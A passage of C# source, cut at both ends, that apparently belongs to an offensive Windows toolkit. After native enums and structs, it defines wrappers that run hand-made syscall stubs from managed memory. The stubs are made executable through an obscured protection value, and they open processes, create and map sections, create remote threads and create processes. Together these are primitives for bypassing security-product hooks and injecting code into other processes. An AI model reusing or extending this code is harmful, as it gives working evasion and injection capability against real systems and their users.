ObjectPathNotFound = 0xc000003a, 129 | ObjectPathSyntaxBad = 0xc000003b, 130 | DataOverrun = 0xc000003c, 131 | DataLate = 0xc000003d, 132 | DataError = 0xc000003e, 133 | CrcError = 0xc000003f, 134 | SectionTooBig = 0xc0000040, 135 | PortConnectionRefused = 0xc0000041, 136 | InvalidPortHandle = 0xc0000042, 137 | SharingViolation = 0xc0000043, 138 | QuotaExceeded = 0xc0000044, 139 | InvalidPageProtection = 0xc0000045, 140 | MutantNotOwned = 0xc0000046, 141 | SemaphoreLimitExceeded = 0xc0000047, 142 | PortAlreadySet = 0xc0000048, 143 | SectionNotImage = 0xc0000049, 144 | SuspendCountExceeded = 0xc000004a, 145 | ThreadIsTerminating = 0xc000004b, 146 | BadWorkingSetLimit = 0xc000004c, 147 | IncompatibleFileMap = 0xc000004d, 148 | SectionProtection = 0xc000004e, 149 | EasNotSupported = 0xc000004f, 150 | EaTooLarge = 0xc0000050, 151 | NonExistentEaEntry = 0xc0000051, 152 | NoEasOnFile = 0xc0000052, 153 | EaCorruptError = 0xc0000053, 154 | FileLockConflict = 0xc0000054, 155 | LockNotGranted = 0xc0000055, 156 | DeletePending = 0xc0000056, 157 | 
CtlFileNotSupported = 0xc0000057, 158 | UnknownRevision = 0xc0000058, 159 | RevisionMismatch = 0xc0000059, 160 | InvalidOwner = 0xc000005a, 161 | InvalidPrimaryGroup = 0xc000005b, 162 | NoImpersonationToken = 0xc000005c, 163 | CantDisableMandatory = 0xc000005d, 164 | NoLogonServers = 0xc000005e, 165 | NoSuchLogonSession = 0xc000005f, 166 | NoSuchPrivilege = 0xc0000060, 167 | PrivilegeNotHeld = 0xc0000061, 168 | InvalidAccountName = 0xc0000062, 169 | UserExists = 0xc0000063, 170 | NoSuchUser = 0xc0000064, 171 | GroupExists = 0xc0000065, 172 | NoSuchGroup = 0xc0000066, 173 | MemberInGroup = 0xc0000067, 174 | MemberNotInGroup = 0xc0000068, 175 | LastAdmin = 0xc0000069, 176 | WrongPassword = 0xc000006a, 177 | IllFormedPassword = 0xc000006b, 178 | PasswordRestriction = 0xc000006c, 179 | LogonFailure = 0xc000006d, 180 | AccountRestriction = 0xc000006e, 181 | InvalidLogonHours = 0xc000006f, 182 | InvalidWorkstation = 0xc0000070, 183 | PasswordExpired = 0xc0000071, 184 | AccountDisabled = 0xc0000072, 185 | NoneMapped = 0xc0000073, 186 | TooManyLuidsRequested = 0xc0000074, 187 | LuidsExhausted = 0xc0000075, 188 | InvalidSubAuthority = 0xc0000076, 189 | InvalidAcl = 0xc0000077, 190 | InvalidSid = 0xc0000078, 191 | InvalidSecurityDescr = 0xc0000079, 192 | ProcedureNotFound = 0xc000007a, 193 | InvalidImageFormat = 0xc000007b, 194 | NoToken = 0xc000007c, 195 | BadInheritanceAcl = 0xc000007d, 196 | RangeNotLocked = 0xc000007e, 197 | DiskFull = 0xc000007f, 198 | ServerDisabled = 0xc0000080, 199 | ServerNotDisabled = 0xc0000081, 200 | TooManyGuidsRequested = 0xc0000082, 201 | GuidsExhausted = 0xc0000083, 202 | InvalidIdAuthority = 0xc0000084, 203 | AgentsExhausted = 0xc0000085, 204 | InvalidVolumeLabel = 0xc0000086, 205 | SectionNotExtended = 0xc0000087, 206 | NotMappedData = 0xc0000088, 207 | ResourceDataNotFound = 0xc0000089, 208 | ResourceTypeNotFound = 0xc000008a, 209 | ResourceNameNotFound = 0xc000008b, 210 | ArrayBoundsExceeded = 0xc000008c, 211 | FloatDenormalOperand = 
0xc000008d, 212 | FloatDivideByZero = 0xc000008e, 213 | FloatInexactResult = 0xc000008f, 214 | FloatInvalidOperation = 0xc0000090, 215 | FloatOverflow = 0xc0000091, 216 | FloatStackCheck = 0xc0000092, 217 | FloatUnderflow = 0xc0000093, 218 | IntegerDivideByZero = 0xc0000094, 219 | IntegerOverflow = 0xc0000095, 220 | PrivilegedInstruction = 0xc0000096, 221 | TooManyPagingFiles = 0xc0000097, 222 | FileInvalid = 0xc0000098, 223 | InstanceNotAvailable = 0xc00000ab, 224 | PipeNotAvailable = 0xc00000ac, 225 | InvalidPipeState = 0xc00000ad, 226 | PipeBusy = 0xc00000ae, 227 | IllegalFunction = 0xc00000af, 228 | PipeDisconnected = 0xc00000b0, 229 | PipeClosing = 0xc00000b1, 230 | PipeConnected = 0xc00000b2, 231 | PipeListening = 0xc00000b3, 232 | InvalidReadMode = 0xc00000b4, 233 | IoTimeout = 0xc00000b5, 234 | FileForcedClosed = 0xc00000b6, 235 | ProfilingNotStarted = 0xc00000b7, 236 | ProfilingNotStopped = 0xc00000b8, 237 | NotSameDevice = 0xc00000d4, 238 | FileRenamed = 0xc00000d5, 239 | CantWait = 0xc00000d8, 240 | PipeEmpty = 0xc00000d9, 241 | CantTerminateSelf = 0xc00000db, 242 | InternalError = 0xc00000e5, 243 | InvalidParameter1 = 0xc00000ef, 244 | InvalidParameter2 = 0xc00000f0, 245 | InvalidParameter3 = 0xc00000f1, 246 | InvalidParameter4 = 0xc00000f2, 247 | InvalidParameter5 = 0xc00000f3, 248 | InvalidParameter6 = 0xc00000f4, 249 | InvalidParameter7 = 0xc00000f5, 250 | InvalidParameter8 = 0xc00000f6, 251 | InvalidParameter9 = 0xc00000f7, 252 | InvalidParameter10 = 0xc00000f8, 253 | InvalidParameter11 = 0xc00000f9, 254 | InvalidParameter12 = 0xc00000fa, 255 | MappedFileSizeZero = 0xc000011e, 256 | TooManyOpenedFiles = 0xc000011f, 257 | Cancelled = 0xc0000120, 258 | CannotDelete = 0xc0000121, 259 | InvalidComputerName = 0xc0000122, 260 | FileDeleted = 0xc0000123, 261 | SpecialAccount = 0xc0000124, 262 | SpecialGroup = 0xc0000125, 263 | SpecialUser = 0xc0000126, 264 | MembersPrimaryGroup = 0xc0000127, 265 | FileClosed = 0xc0000128, 266 | TooManyThreads = 0xc0000129, 
267 | ThreadNotInProcess = 0xc000012a, 268 | TokenAlreadyInUse = 0xc000012b, 269 | PagefileQuotaExceeded = 0xc000012c, 270 | CommitmentLimit = 0xc000012d, 271 | InvalidImageLeFormat = 0xc000012e, 272 | InvalidImageNotMz = 0xc000012f, 273 | InvalidImageProtect = 0xc0000130, 274 | InvalidImageWin16 = 0xc0000131, 275 | LogonServer = 0xc0000132, 276 | DifferenceAtDc = 0xc0000133, 277 | SynchronizationRequired = 0xc0000134, 278 | DllNotFound = 0xc0000135, 279 | IoPrivilegeFailed = 0xc0000137, 280 | OrdinalNotFound = 0xc0000138, 281 | EntryPointNotFound = 0xc0000139, 282 | ControlCExit = 0xc000013a, 283 | PortNotSet = 0xc0000353, 284 | DebuggerInactive = 0xc0000354, 285 | CallbackBypass = 0xc0000503, 286 | PortClosed = 0xc0000700, 287 | MessageLost = 0xc0000701, 288 | InvalidMessage = 0xc0000702, 289 | RequestCanceled = 0xc0000703, 290 | RecursiveDispatch = 0xc0000704, 291 | LpcReceiveBufferExpected = 0xc0000705, 292 | LpcInvalidConnectionUsage = 0xc0000706, 293 | LpcRequestsNotAllowed = 0xc0000707, 294 | ResourceInUse = 0xc0000708, 295 | ProcessIsProtected = 0xc0000712, 296 | VolumeDirty = 0xc0000806, 297 | FileCheckedOut = 0xc0000901, 298 | CheckOutRequired = 0xc0000902, 299 | BadFileType = 0xc0000903, 300 | FileTooLarge = 0xc0000904, 301 | FormsAuthRequired = 0xc0000905, 302 | VirusInfected = 0xc0000906, 303 | VirusDeleted = 0xc0000907, 304 | TransactionalConflict = 0xc0190001, 305 | InvalidTransaction = 0xc0190002, 306 | TransactionNotActive = 0xc0190003, 307 | TmInitializationFailed = 0xc0190004, 308 | RmNotActive = 0xc0190005, 309 | RmMetadataCorrupt = 0xc0190006, 310 | TransactionNotJoined = 0xc0190007, 311 | DirectoryNotRm = 0xc0190008, 312 | CouldNotResizeLog = 0xc0190009, 313 | TransactionsUnsupportedRemote = 0xc019000a, 314 | LogResizeInvalidSize = 0xc019000b, 315 | RemoteFileVersionMismatch = 0xc019000c, 316 | CrmProtocolAlreadyExists = 0xc019000f, 317 | TransactionPropagationFailed = 0xc0190010, 318 | CrmProtocolNotFound = 0xc0190011, 319 | 
TransactionSuperiorExists = 0xc0190012, 320 | TransactionRequestNotValid = 0xc0190013, 321 | TransactionNotRequested = 0xc0190014, 322 | TransactionAlreadyAborted = 0xc0190015, 323 | TransactionAlreadyCommitted = 0xc0190016, 324 | TransactionInvalidMarshallBuffer = 0xc0190017, 325 | CurrentTransactionNotValid = 0xc0190018, 326 | LogGrowthFailed = 0xc0190019, 327 | ObjectNoLongerExists = 0xc0190021, 328 | StreamMiniversionNotFound = 0xc0190022, 329 | StreamMiniversionNotValid = 0xc0190023, 330 | MiniversionInaccessibleFromSpecifiedTransaction = 0xc0190024, 331 | CantOpenMiniversionWithModifyIntent = 0xc0190025, 332 | CantCreateMoreStreamMiniversions = 0xc0190026, 333 | HandleNoLongerValid = 0xc0190028, 334 | NoTxfMetadata = 0xc0190029, 335 | LogCorruptionDetected = 0xc0190030, 336 | CantRecoverWithHandleOpen = 0xc0190031, 337 | RmDisconnected = 0xc0190032, 338 | EnlistmentNotSuperior = 0xc0190033, 339 | RecoveryNotNeeded = 0xc0190034, 340 | RmAlreadyStarted = 0xc0190035, 341 | FileIdentityNotPersistent = 0xc0190036, 342 | CantBreakTransactionalDependency = 0xc0190037, 343 | CantCrossRmBoundary = 0xc0190038, 344 | TxfDirNotEmpty = 0xc0190039, 345 | IndoubtTransactionsExist = 0xc019003a, 346 | TmVolatile = 0xc019003b, 347 | RollbackTimerExpired = 0xc019003c, 348 | TxfAttributeCorrupt = 0xc019003d, 349 | EfsNotAllowedInTransaction = 0xc019003e, 350 | TransactionalOpenNotAllowed = 0xc019003f, 351 | TransactedMappingUnsupportedRemote = 0xc0190040, 352 | TxfMetadataAlreadyPresent = 0xc0190041, 353 | TransactionScopeCallbacksNotSet = 0xc0190042, 354 | TransactionRequiredPromotion = 0xc0190043, 355 | CannotExecuteFileInTransaction = 0xc0190044, 356 | TransactionsNotFrozen = 0xc0190045, 357 | MaximumNtStatus = 0xffffffff 358 | }; 359 | 360 | 361 | public enum THREAD_INFORMATION_CLASS { 362 | ThreadBasicInformation, 363 | ThreadTimes, 364 | ThreadPriority, 365 | ThreadBasePriority, 366 | ThreadAffinityMask, 367 | ThreadImpersonationToken, 368 | ThreadDescriptorTableEntry, 369 
| ThreadEnableAlignmentFaultFixup, 370 | ThreadEventPair, 371 | ThreadQuerySetWin32StartAddress, 372 | ThreadZeroTlsCell, 373 | ThreadPerformanceCount, 374 | ThreadAmILastThread, 375 | ThreadIdealProcessor, 376 | ThreadPriorityBoost, 377 | ThreadSetTlsArrayAddress, 378 | ThreadIsIoPending, 379 | ThreadHideFromDebugger, 380 | ThreadBreakOnTermination, 381 | ThreadSwitchLegacyState, 382 | ThreadIsTerminated, 383 | ThreadLastSystemCall, 384 | ThreadIoPriority, 385 | ThreadCycleTime, 386 | ThreadPagePriority, 387 | ThreadActualBasePriority, 388 | ThreadTebInformation, 389 | ThreadCSwitchMon, 390 | MaxThreadInfoClass 391 | } 392 | 393 | 394 | [StructLayout(LayoutKind.Sequential)] 395 | public struct THREAD_BASIC_INFORMATION { 396 | public int ExitStatus; 397 | public int TebBaseAddress; 398 | public CLIENT_ID ClientId; 399 | public int AffinityMask; 400 | public int Priority; 401 | public int BasePriority; 402 | } 403 | 404 | public enum ProcessAccessFlags : uint 405 | { 406 | Terminate = 0x00000001, 407 | CreateThread = 0x00000002, 408 | VMOperation = 0x00000008, 409 | VMRead = 0x00000010, 410 | VMWrite = 0x00000020, 411 | DupHandle = 0x00000040, 412 | SetInformation = 0x00000200, 413 | QueryInformation = 0x00000400, 414 | Synchronize = 0x00100000, 415 | All = 0x001F0FFF 416 | } 417 | 418 | [StructLayout(LayoutKind.Sequential)] 419 | public struct OBJECT_ATTRIBUTES 420 | { 421 | public ulong Length; 422 | public IntPtr RootDirectory; 423 | public IntPtr ObjectName; 424 | public ulong Attributes; 425 | public IntPtr SecurityDescriptor; 426 | public IntPtr SecurityQualityOfService; 427 | } 428 | 429 | [StructLayout(LayoutKind.Sequential)] 430 | public struct SECTION_DATA 431 | { 432 | public Boolean isvalid; 433 | public IntPtr SectionHandle; 434 | public IntPtr pBase; 435 | } 436 | 437 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 438 | public struct OSVERSIONINFOEXW 439 | { 440 | public int dwOSVersionInfoSize; 441 | public int dwMajorVersion; 442 
| public int dwMinorVersion; 443 | public int dwBuildNumber; 444 | public int dwPlatformId; 445 | [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 128)] 446 | public string szCSDVersion; 447 | public UInt16 wServicePackMajor; 448 | public UInt16 wServicePackMinor; 449 | public UInt16 wSuiteMask; 450 | public byte wProductType; 451 | public byte wReserved; 452 | } 453 | 454 | 455 | [Flags] 456 | public enum ACCESS_MASK : uint 457 | { 458 | DELETE = 0x00010000, 459 | READ_CONTROL = 0x00020000, 460 | WRITE_DAC = 0x00040000, 461 | WRITE_OWNER = 0x00080000, 462 | SYNCHRONIZE = 0x00100000, 463 | STANDARD_RIGHTS_REQUIRED = 0x000F0000, 464 | STANDARD_RIGHTS_READ = 0x00020000, 465 | STANDARD_RIGHTS_WRITE = 0x00020000, 466 | STANDARD_RIGHTS_EXECUTE = 0x00020000, 467 | STANDARD_RIGHTS_ALL = 0x001F0000, 468 | SPECIFIC_RIGHTS_ALL = 0x0000FFFF, 469 | ACCESS_SYSTEM_SECURITY = 0x01000000, 470 | MAXIMUM_ALLOWED = 0x02000000, 471 | GENERIC_READ = 0x80000000, 472 | GENERIC_WRITE = 0x40000000, 473 | GENERIC_EXECUTE = 0x20000000, 474 | GENERIC_ALL = 0x10000000, 475 | DESKTOP_READOBJECTS = 0x00000001, 476 | DESKTOP_CREATEWINDOW = 0x00000002, 477 | DESKTOP_CREATEMENU = 0x00000004, 478 | DESKTOP_HOOKCONTROL = 0x00000008, 479 | DESKTOP_JOURNALRECORD = 0x00000010, 480 | DESKTOP_JOURNALPLAYBACK = 0x00000020, 481 | DESKTOP_ENUMERATE = 0x00000040, 482 | DESKTOP_WRITEOBJECTS = 0x00000080, 483 | DESKTOP_SWITCHDESKTOP = 0x00000100, 484 | WINSTA_ENUMDESKTOPS = 0x00000001, 485 | WINSTA_READATTRIBUTES = 0x00000002, 486 | WINSTA_ACCESSCLIPBOARD = 0x00000004, 487 | WINSTA_CREATEDESKTOP = 0x00000008, 488 | WINSTA_WRITEATTRIBUTES = 0x00000010, 489 | WINSTA_ACCESSGLOBALATOMS = 0x00000020, 490 | WINSTA_EXITWINDOWS = 0x00000040, 491 | WINSTA_ENUMERATE = 0x00000100, 492 | WINSTA_READSCREEN = 0x00000200, 493 | WINSTA_ALL_ACCESS = 0x0000037F 494 | } 495 | 496 | [StructLayout(LayoutKind.Sequential)] 497 | public struct CLIENT_ID 498 | { 499 | public IntPtr UniqueProcess; 500 | public IntPtr UniqueThread; 501 | 
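}

        // ------------------------------------------------------------------------
        // ntdll exports called through their export address (no P/Invoke).
        // ------------------------------------------------------------------------

        [SuppressUnmanagedCodeSecurity]
        [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
        public delegate NTSTATUS ProtectorX(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, UInt32 NewProtect, ref UInt32 OldProtect);

        /// <summary>
        /// Calls ntdll!ZwProtectVirtualMemory via its export address, resolved from the
        /// already-loaded ntdll image by <see cref="GetLibraryAddress"/>.
        /// <see cref="ZwProtectVirtualMemory"/>, <see cref="ZwOpenProcessToken"/> and
        /// <see cref="ZwWaitForSingleObject"/> use it to make their stub page executable;
        /// the other stub wrappers go through <see cref="ZwProtectVirtualMemory"/> instead.
        /// </summary>
        /// <remarks>
        /// If the export cannot be resolved the pointer is zero, which
        /// <see cref="Marshal.GetDelegateForFunctionPointer(IntPtr, Type)"/> rejects
        /// (ArgumentNullException) rather than dereferencing.
        /// </remarks>
        public static NTSTATUS Protector(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, UInt32 NewProtect, ref UInt32 OldProtect)
        {
            IntPtr proc = GetLibraryAddress(@"C:\Windows\System32\ntdll.dll", "ZwProtectVirtualMemory", false);
            ProtectorX ProtectorFunc = (ProtectorX)Marshal.GetDelegateForFunctionPointer(proc, typeof(ProtectorX));
            return (NTSTATUS)ProtectorFunc(ProcessHandle, ref BaseAddress, ref RegionSize, NewProtect, ref OldProtect);
        }

        [SuppressUnmanagedCodeSecurity]
        [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
        public delegate NTSTATUS RtlCreateUserThreadX(IntPtr hProcess, uint lpThreadSecurity, bool bCreateSuspended, uint dwStackZeroBits, IntPtr pStackReserved, IntPtr pStackCommit, IntPtr pStartAddress, IntPtr pStartParameter, out IntPtr hThread, out CLIENT_ID pClientId);

        /// <summary>
        /// Calls ntdll!RtlCreateUserThread via its export address (it is a library routine,
        /// not a system service, so there is no stub for it).
        /// </summary>
        /// <remarks>
        /// NOTE(review): lpThreadSecurity is declared as uint; if the native parameter is a
        /// pointer (security descriptor), only 0 is safe to pass on 64-bit — confirm against
        /// the ntdll prototype.
        /// </remarks>
        public static NTSTATUS RtlCreateUserThread(IntPtr hProcess, uint lpThreadSecurity, bool bCreateSuspended, uint dwStackZeroBits, IntPtr pStackReserved, IntPtr pStackCommit, IntPtr pStartAddress, IntPtr pStartParameter, out IntPtr hThread, out CLIENT_ID pClientId)
        {
            IntPtr proc = GetLibraryAddress(@"C:\Windows\System32\ntdll.dll", "RtlCreateUserThread", false);
            RtlCreateUserThreadX RtlCreateUserThreadXFunc = (RtlCreateUserThreadX)Marshal.GetDelegateForFunctionPointer(proc, typeof(RtlCreateUserThreadX));
            return (NTSTATUS)RtlCreateUserThreadXFunc(hProcess, lpThreadSecurity, bCreateSuspended, dwStackZeroBits, pStackReserved, pStackCommit, pStartAddress, pStartParameter, out hThread, out pClientId);
        }

        // ------------------------------------------------------------------------
        // System services invoked through an in-process stub.
        //
        // Every wrapper below follows the same sequence:
        //   1. ask GetOSVersionAndReturnSyscall for the 11-byte stub of this service,
        //   2. pin the managed byte[] so it cannot move,
        //   3. change the protection of the page holding it to the value Zeta() yields,
        //   4. build a delegate over the pinned address and call it.
        // The protect call receives BaseAddress/RegionSize by ref and may rewrite them
        // (page rounding), which is why an untouched copy of the pointer is kept for the
        // delegate. The status of the protect call is not checked anywhere, and the page
        // protection is never restored afterwards.
        // ------------------------------------------------------------------------

        [SuppressUnmanagedCodeSecurity]
        [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
        public delegate NTSTATUS ZwProtectVirtualMemoryX(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr NumberOfBytesToProtect, UInt32 NewAccessProtection, ref UInt32 lpNumberOfBytesWritten);

        /// <summary>
        /// Stub-based ZwProtectVirtualMemory (sysType 16). Its own stub page is made
        /// executable with <see cref="Protector"/> (the export-address path), since the stub
        /// version cannot be used before it is executable.
        /// </summary>
        /// <param name="lpNumberOfBytesWritten">
        /// Despite the name this receives the previous protection value — every caller
        /// passes its <c>oldprotect</c> local here.
        /// </param>
        public static NTSTATUS ZwProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr NumberOfBytesToProtect, UInt32 NewAccessProtection, ref UInt32 lpNumberOfBytesWritten, ref OSVERSIONINFOEXW osVersionInfo)
        {
            byte[] syscall = GetOSVersionAndReturnSyscall(16, ref osVersionInfo);
            unsafe
            {
                fixed (byte* ptr = syscall)
                {
                    IntPtr allocMemAddress = (IntPtr)ptr;
                    IntPtr allocMemAddressCopy = (IntPtr)ptr;
                    UInt32 size = (uint)syscall.Length;
                    IntPtr sizeIntPtr = (IntPtr)size;
                    UInt32 oldprotect = 0;
                    Protector(new IntPtr(-1), ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect);
                    ZwProtectVirtualMemoryX ZwProtectVirtualMemoryFunc = (ZwProtectVirtualMemoryX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwProtectVirtualMemoryX));
                    return (NTSTATUS)ZwProtectVirtualMemoryFunc(ProcessHandle, ref BaseAddress, ref NumberOfBytesToProtect, NewAccessProtection, ref lpNumberOfBytesWritten);
                }
            }
        }

        [SuppressUnmanagedCodeSecurity]
        [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
        public delegate NTSTATUS ZwCreateSectionX(ref IntPtr section, UInt32 desiredAccess, IntPtr pAttrs, ref long MaximumSize, uint pageProt, uint allocationAttribs, IntPtr hFile);

        /// <summary>Stub-based ZwCreateSection (sysType 5).</summary>
        public static NTSTATUS ZwCreateSection(ref IntPtr section, UInt32 desiredAccess, IntPtr pAttrs, ref long MaximumSize, uint pageProt, uint allocationAttribs, IntPtr hFile, ref OSVERSIONINFOEXW osVersionInfo)
        {
            byte[] syscall = GetOSVersionAndReturnSyscall(5, ref osVersionInfo);
            unsafe
            {
                fixed (byte* ptr = syscall)
                {
                    IntPtr allocMemAddress = (IntPtr)ptr;
                    IntPtr allocMemAddressCopy = (IntPtr)ptr;
                    UInt32 size = (uint)syscall.Length;
                    IntPtr sizeIntPtr = (IntPtr)size;
                    UInt32 oldprotect = 0;
                    ZwProtectVirtualMemory(new IntPtr(-1), ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo);
                    ZwCreateSectionX ZwCreateSectionFunc = (ZwCreateSectionX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwCreateSectionX));
                    return (NTSTATUS)ZwCreateSectionFunc(ref section, desiredAccess, pAttrs, ref MaximumSize, pageProt, allocationAttribs, hFile);
                }
            }
        }

        [SuppressUnmanagedCodeSecurity]
        [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
        public delegate NTSTATUS ZwMapViewOfSectionX(IntPtr SectionHandle, IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, IntPtr CommitSize, ref long SectionOffset, ref long ViewSize, uint InheritDisposition, uint AllocationType, uint Win32Protect);

        /// <summary>Stub-based ZwMapViewOfSection (sysType 6).</summary>
        /// <remarks>
        /// NOTE(review): the protect call below is given the caller's ProcessHandle while
        /// allocMemAddress points at this process's own pinned stub; the sibling wrappers
        /// pass new IntPtr(-1) (current process) for the same call. Looks like a copy/paste
        /// slip — confirm.
        /// </remarks>
        public static NTSTATUS ZwMapViewOfSection(IntPtr SectionHandle, IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, IntPtr CommitSize, ref long SectionOffset, ref long ViewSize, uint InheritDisposition, uint AllocationType, uint Win32Protect, ref OSVERSIONINFOEXW osVersionInfo)
        {
            byte[] syscall = GetOSVersionAndReturnSyscall(6, ref osVersionInfo);
            unsafe
            {
                fixed (byte* ptr = syscall)
                {
                    IntPtr allocMemAddress = (IntPtr)ptr;
                    IntPtr allocMemAddressCopy = (IntPtr)ptr;
                    UInt32 size = (uint)syscall.Length;
                    IntPtr sizeIntPtr = (IntPtr)size;
                    UInt32 oldprotect = 0;
                    ZwProtectVirtualMemory(ProcessHandle, ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo);
                    ZwMapViewOfSectionX ZwMapViewOfSectionFunc = (ZwMapViewOfSectionX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwMapViewOfSectionX));
                    return (NTSTATUS)ZwMapViewOfSectionFunc(SectionHandle, ProcessHandle, ref BaseAddress, ZeroBits, CommitSize, ref SectionOffset, ref ViewSize, InheritDisposition, AllocationType, Win32Protect);
                }
            }
        }

        [SuppressUnmanagedCodeSecurity]
        [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
        public delegate NTSTATUS ZwOpenProcessX(out IntPtr ProcessHandle, ProcessAccessFlags processAccess, OBJECT_ATTRIBUTES objAttribute, ref CLIENT_ID clientid);

        /// <summary>Stub-based ZwOpenProcess (sysType 1).</summary>
        public static NTSTATUS ZwOpenProcess(out IntPtr ProcessHandle, ProcessAccessFlags processAccess, OBJECT_ATTRIBUTES objAttribute, ref CLIENT_ID clientid, ref OSVERSIONINFOEXW osVersionInfo)
        {
            byte[] syscall = GetOSVersionAndReturnSyscall(1, ref osVersionInfo);
            unsafe
            {
                fixed (byte* ptr = syscall)
                {
                    IntPtr allocMemAddress = (IntPtr)ptr;
                    IntPtr allocMemAddressCopy = (IntPtr)ptr;
                    UInt32 size = (uint)syscall.Length;
                    IntPtr sizeIntPtr = (IntPtr)size;
                    UInt32 oldprotect = 0;
                    ZwProtectVirtualMemory(new IntPtr(-1), ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo);
                    ZwOpenProcessX ZwOpenProcessFunc = (ZwOpenProcessX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwOpenProcessX));
                    return (NTSTATUS)ZwOpenProcessFunc(out ProcessHandle, processAccess, objAttribute, ref clientid);
                }
            }
        }

        [SuppressUnmanagedCodeSecurity]
        [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
        public delegate NTSTATUS NtCreateThreadExX(out IntPtr threadHandle, uint desiredAccess, IntPtr objectAttributes, IntPtr processHandle, IntPtr lpStartAddress, IntPtr lpParameter, int createSuspended, uint stackZeroBits, uint sizeOfStackCommit, uint sizeOfStackReserve, IntPtr lpBytesBuffer);

        /// <summary>Stub-based ZwCreateThreadEx (sysType 2).</summary>
        public static NTSTATUS ZwCreateThreadEx(out IntPtr threadHandle, uint desiredAccess, IntPtr objectAttributes, IntPtr processHandle, IntPtr lpStartAddress, IntPtr lpParameter, int createSuspended, uint stackZeroBits, uint sizeOfStackCommit, uint sizeOfStackReserve, IntPtr lpBytesBuffer, ref OSVERSIONINFOEXW osVersionInfo)
        {
            byte[] syscall = GetOSVersionAndReturnSyscall(2, ref osVersionInfo);
            unsafe
            {
                fixed (byte* ptr = syscall)
                {
                    IntPtr allocMemAddress = (IntPtr)ptr;
                    IntPtr allocMemAddressCopy = (IntPtr)ptr;
                    uint size = (uint)syscall.Length;
                    IntPtr sizeIntPtr = (IntPtr)size;
                    UInt32 oldprotect = 0;
                    ZwProtectVirtualMemory(new IntPtr(-1), ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo);
                    NtCreateThreadExX NtCreateThreadExFunc = (NtCreateThreadExX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(NtCreateThreadExX));
                    return (NTSTATUS)NtCreateThreadExFunc(out threadHandle, desiredAccess, objectAttributes, processHandle, lpStartAddress, lpParameter, createSuspended, stackZeroBits, sizeOfStackCommit, sizeOfStackReserve, lpBytesBuffer);
                }
            }
        }

        [SuppressUnmanagedCodeSecurity]
        [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
        public delegate NTSTATUS ZwCloseX(IntPtr ProcessHandle);

        /// <summary>Stub-based ZwClose (sysType 13). Works for any handle, not only processes.</summary>
        public static NTSTATUS ZwClose(IntPtr ProcessHandle, ref OSVERSIONINFOEXW osVersionInfo)
        {
            byte[] syscall = GetOSVersionAndReturnSyscall(13, ref osVersionInfo);
            unsafe
            {
                fixed (byte* ptr = syscall)
                {
                    IntPtr allocMemAddress = (IntPtr)ptr;
                    IntPtr allocMemAddressCopy = (IntPtr)ptr;
                    UInt32 size = (uint)syscall.Length;
                    IntPtr sizeIntPtr = (IntPtr)size;
                    UInt32 oldprotect = 0;
                    ZwProtectVirtualMemory(new IntPtr(-1), ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo);
                    ZwCloseX ZwCloseFunc = (ZwCloseX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwCloseX));
                    return (NTSTATUS)ZwCloseFunc(ProcessHandle);
                }
            }
        }

        [SuppressUnmanagedCodeSecurity]
        [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
        public delegate NTSTATUS ZwCreateProcessX(out IntPtr ProcessHandle, ACCESS_MASK DesiredAccess, OBJECT_ATTRIBUTES ObjectAttributes, IntPtr InheriteFromProcessHandle, bool InheritHandles, IntPtr SectionHandle, IntPtr DebugPort, IntPtr ExceptionPort);

        /// <summary>Stub-based ZwCreateProcess (sysType 7).</summary>
        public static NTSTATUS ZwCreateProcess(out IntPtr ProcessHandle, ACCESS_MASK DesiredAccess, OBJECT_ATTRIBUTES ObjectAttributes, IntPtr InheriteFromProcessHandle, bool InheritHandles, IntPtr SectionHandle, IntPtr DebugPort, IntPtr ExceptionPort, ref OSVERSIONINFOEXW osVersionInfo)
        {
            byte[] syscall = GetOSVersionAndReturnSyscall(7, ref osVersionInfo);
            unsafe
            {
                fixed (byte* ptr = syscall)
                {
                    IntPtr allocMemAddress = (IntPtr)ptr;
                    IntPtr allocMemAddressCopy = (IntPtr)ptr;
                    UInt32 size = (uint)syscall.Length;
                    IntPtr sizeIntPtr = (IntPtr)size;
                    UInt32 oldprotect = 0;
                    ZwProtectVirtualMemory(new IntPtr(-1), ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo);
                    ZwCreateProcessX ZwCreateProcessXFunc = (ZwCreateProcessX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwCreateProcessX));
                    return (NTSTATUS)ZwCreateProcessXFunc(out ProcessHandle, DesiredAccess, ObjectAttributes, InheriteFromProcessHandle, InheritHandles, SectionHandle, DebugPort, ExceptionPort);
                }
            }
        }

        [SuppressUnmanagedCodeSecurity]
        [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
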